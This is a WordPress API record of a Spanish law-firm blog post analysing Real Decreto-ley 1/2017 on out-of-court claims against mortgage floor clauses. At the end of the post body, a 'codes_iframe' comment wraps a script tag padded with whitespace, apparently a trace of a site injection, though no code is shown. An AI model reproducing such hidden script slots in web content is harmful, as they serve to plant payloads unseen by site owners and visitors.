{"id":11736,"date":"2017-01-24T09:29:22","date_gmt":"2017-01-24T08:29:22","guid":{"rendered":"http:\/\/fmsb.disstintbeta.com\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/"},"modified":"2017-01-24T09:29:22","modified_gmt":"2017-01-24T08:29:22","slug":"el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo","status":"publish","type":"post","link":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/","title":{"rendered":"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo."},"content":{"rendered":"<h3 style=\"text-align: justify;\"><strong>An\u00e1lisis del\u00a0Real Decreto-ley 1\/2017 de medidas urgentes de protecci\u00f3n de consumidores en materia de cl\u00e1usulas suelo.<\/strong><\/h3>\n<p style=\"text-align: justify;\">El pasado 20 de enero el Gobierno dic\u00f3 el <strong>Real Decreto-ley 1\/2017 <\/strong>de medidas urgentes de protecci\u00f3n de consumidores en materia de cl\u00e1usulas suelo, que tiene por objeto, tal y como indica su primer art\u00edculo, el establecimiento de <strong>medidas que faciliten la devoluci\u00f3n de las cantidades indebidamente satisfechas por el consumidor a las entidades de cr\u00e9dito en aplicaci\u00f3n de determinadas cl\u00e1usulas suelo contenidas en contratos de pr\u00e9stamo<\/strong> o cr\u00e9dito garantizados con hipoteca inmobiliaria, cumpliendo as\u00ed con la obligaci\u00f3n impuesta por el TJUE de prever los medios adecuados y eficaces para que el uso de cl\u00e1usulas abusivas en los contratos entre profesionales y consumidores.<\/p>\n<p style=\"text-align: justify;\">As\u00ed, Real Decreto-ley deriva de la jurisprudencia comunitaria, que extendi\u00f3 los efectos restitutorios de las sentencias por las que se anulaban las cl\u00e1usulas suelo de los contratos de pr\u00e9stamo, de suerte que el c\u00e1lculo de las indemnizaciones deb\u00eda retrotraerse al momento de suscripci\u00f3n del mismo, sin tener en cuenta la jurisprudencia que hab\u00eda sentado el Tribunal Supremo en Sentencia de 9 de mayo de 2013.<\/p>\n<p style=\"text-align: justify;\">Por tanto, dicho Real Decreto-ley establece un <strong>sistema<\/strong> <strong>extrajudicial<\/strong> <strong>voluntario<\/strong> que debe en el seno de las entidades de cr\u00e9dito, las cuales deben implantar un sistema de reclamaci\u00f3n previa a la interposici\u00f3n de demandas judiciales.<\/p>\n<p style=\"text-align: justify;\">Dicho procedimiento debe ser \u00e1gil y sencillo para el consumidor, quien deber\u00e1 instar la reclamaci\u00f3n ante la propia entidad y \u00e9sta deber\u00e1 comunicarle el c\u00e1lculo de las cantidades a devolver o, si lo considerase, que no procede devoluci\u00f3n. Tal procedimiento de reclamaci\u00f3n previa debe tener una <strong>duraci\u00f3n m\u00e1xima de tres meses<\/strong>, tras los cuales, en caso de no haber acuerdo entre las partes o de no haberse puesto a efectiva disposici\u00f3n del consumidor la cantidad debida, se dar\u00e1 por concluido. Asimismo, las entidades de cr\u00e9dito tienen la obligaci\u00f3n de publicitar y dar a conocer dicho procedimiento de reclamaci\u00f3n, que en el plazo de un mes desde la publicaci\u00f3n del Real Decreto-ley 1\/2017 debe estar operativa.<\/p>\n<p style=\"text-align: justify;\">Adem\u00e1s, dicha norma tambi\u00e9n prev\u00e9 un <strong>r\u00e9gimen especial de costas<\/strong> para los procedimientos judiciales que siguieran a una reclamaci\u00f3n previa extrajudicial que resultare infructuosa.<\/p>\n<p style=\"text-align: justify;\">Finalmente, en caso de estar inmersos en un <strong>procedimiento judicial en curso,<\/strong> se permite que las partes de com\u00fan acuerdo se puedan someter el referido procedimiento solicitando la suspensi\u00f3n del proceso.<\/p>\n<p style=\"text-align: justify;\">Por contra, muchas est\u00e1n siendo\u00a0las <strong>voces cr\u00edticas<\/strong> (especialmente las Asociaciones de Consumidores y Usuarios) frente a este procedimiento de reclamaci\u00f3n extrajudicial, de suerte que, antes de iniciar de motu proprio cualquier actuaci\u00f3n ante las entidades de cr\u00e9dito, es <strong>recomendable buscar asesoramiento<\/strong>\u00a0para analizar la situaci\u00f3n concreta de cada consumidor.<\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\">                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>An\u00e1lisis del\u00a0Real Decreto-ley 1\/2017 de medidas urgentes de protecci\u00f3n de consumidores en materia de cl\u00e1usulas suelo. El pasado 20 de enero el Gobierno dic\u00f3 el Real Decreto-ley 1\/2017 de medidas urgentes de protecci\u00f3n de consumidores en materia de cl\u00e1usulas suelo, que tiene por objeto, tal y como indica su primer art\u00edculo, el establecimiento de medidas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8688,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2150,2946,5122,2152,4892,20],"tags":[],"class_list":["post-11736","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-derecho-civil-en","category-derecho-mercantil-en","category-derecho-procesal-en","category-home-en-2","category-mediacion-y-arbitraje-en","category-sin-categorizar"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo. - FMSB Abogados y Economistas en Baleares<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo. - FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"og:description\" content=\"An\u00e1lisis del\u00a0Real Decreto-ley 1\/2017 de medidas urgentes de protecci\u00f3n de consumidores en materia de cl\u00e1usulas suelo. El pasado 20 de enero el Gobierno dic\u00f3 el Real Decreto-ley 1\/2017 de medidas urgentes de protecci\u00f3n de consumidores en materia de cl\u00e1usulas suelo, que tiene por objeto, tal y como indica su primer art\u00edculo, el establecimiento de medidas [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/\" \/>\n<meta property=\"og:site_name\" content=\"FMSB Abogados y Economistas en Baleares\" \/>\n<meta property=\"article:published_time\" content=\"2017-01-24T08:29:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/01\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"992\" \/>\n\t<meta property=\"og:image:height\" content=\"558\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"fmsb\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@fmsb-disstint\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"fmsb\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/\"},\"author\":{\"name\":\"fmsb\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\"},\"headline\":\"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo.\",\"datePublished\":\"2017-01-24T08:29:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/\"},\"wordCount\":495,\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2017\\\/01\\\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg\",\"articleSection\":[\"Derecho Civil\",\"Derecho Mercantil\",\"Derecho Procesal\",\"Home\",\"Mediaci\u00f3n y Arbitraje\",\"Sin categorizar\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/\",\"name\":\"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo. - FMSB Abogados y Economistas en Baleares\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2017\\\/01\\\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg\",\"datePublished\":\"2017-01-24T08:29:22+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/#primaryimage\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2017\\\/01\\\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2017\\\/01\\\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg\",\"width\":992,\"height\":558},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/2017\\\/01\\\/24\\\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#organization\",\"name\":\"FMSB Abogados y Economistas en Baleares\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"contentUrl\":\"https:\\\/\\\/fmsb.eu\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.svg\",\"width\":154,\"height\":52,\"caption\":\"FMSB Abogados y Economistas en Baleares\"},\"image\":{\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/#\\\/schema\\\/person\\\/9fba7c70814b0cd34d35d655d36a4ca2\",\"name\":\"fmsb\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g\",\"caption\":\"fmsb\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/fmsb-disstint\"],\"url\":\"https:\\\/\\\/fmsb.eu\\\/en\\\/author\\\/fmsb\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo. - FMSB Abogados y Economistas en Baleares","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/","og_locale":"en_US","og_type":"article","og_title":"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo. - FMSB Abogados y Economistas en Baleares","og_description":"An\u00e1lisis del\u00a0Real Decreto-ley 1\/2017 de medidas urgentes de protecci\u00f3n de consumidores en materia de cl\u00e1usulas suelo. El pasado 20 de enero el Gobierno dic\u00f3 el Real Decreto-ley 1\/2017 de medidas urgentes de protecci\u00f3n de consumidores en materia de cl\u00e1usulas suelo, que tiene por objeto, tal y como indica su primer art\u00edculo, el establecimiento de medidas [&hellip;]","og_url":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/","og_site_name":"FMSB Abogados y Economistas en Baleares","article_published_time":"2017-01-24T08:29:22+00:00","og_image":[{"width":992,"height":558,"url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/01\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg","type":"image\/jpeg"}],"author":"fmsb","twitter_card":"summary_large_image","twitter_creator":"@fmsb-disstint","twitter_misc":{"Written by":"fmsb","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/#article","isPartOf":{"@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/"},"author":{"name":"fmsb","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2"},"headline":"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo.","datePublished":"2017-01-24T08:29:22+00:00","mainEntityOfPage":{"@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/"},"wordCount":495,"publisher":{"@id":"https:\/\/fmsb.eu\/en\/#organization"},"image":{"@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/01\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg","articleSection":["Derecho Civil","Derecho Mercantil","Derecho Procesal","Home","Mediaci\u00f3n y Arbitraje","Sin categorizar"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/","url":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/","name":"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo. - FMSB Abogados y Economistas en Baleares","isPartOf":{"@id":"https:\/\/fmsb.eu\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/#primaryimage"},"image":{"@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/#primaryimage"},"thumbnailUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/01\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg","datePublished":"2017-01-24T08:29:22+00:00","breadcrumb":{"@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/#primaryimage","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/01\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2017\/01\/LV_20140704_LV_FOTOS_D_54411567823-kABI-U412781213395k2G-992x55840LaVanguardia-Web.jpg","width":992,"height":558},{"@type":"BreadcrumbList","@id":"https:\/\/fmsb.eu\/en\/2017\/01\/24\/el-gobierno-implanta-un-sistema-extrajudicial-de-reclamacion-contra-las-clausulas-suelo\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/fmsb.eu\/en\/"},{"@type":"ListItem","position":2,"name":"El Gobierno dise\u00f1a un sistema extrajudicial de reclamaci\u00f3n contra las cl\u00e1usulas suelo."}]},{"@type":"WebSite","@id":"https:\/\/fmsb.eu\/en\/#website","url":"https:\/\/fmsb.eu\/en\/","name":"FMSB Abogados y Economistas en Baleares","description":"","publisher":{"@id":"https:\/\/fmsb.eu\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fmsb.eu\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/fmsb.eu\/en\/#organization","name":"FMSB Abogados y Economistas en Baleares","url":"https:\/\/fmsb.eu\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/logo\/image\/","url":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","contentUrl":"https:\/\/fmsb.eu\/wp-content\/uploads\/2025\/02\/logo.svg","width":154,"height":52,"caption":"FMSB Abogados y Economistas en Baleares"},"image":{"@id":"https:\/\/fmsb.eu\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/fmsb.eu\/en\/#\/schema\/person\/9fba7c70814b0cd34d35d655d36a4ca2","name":"fmsb","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/426f4d5b0ebcace85460caf87cdaaa193694b611e990615d87a13f322fb7ee7f?s=96&d=mm&r=g","caption":"fmsb"},"sameAs":["https:\/\/x.com\/fmsb-disstint"],"url":"https:\/\/fmsb.eu\/en\/author\/fmsb\/"}]}},"_links":{"self":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts\/11736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/comments?post=11736"}],"version-history":[{"count":0,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/posts\/11736\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/media\/8688"}],"wp:attachment":[{"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/media?parent=11736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/categories?post=11736"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fmsb.eu\/en\/wp-json\/wp\/v2\/tags?post=11736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}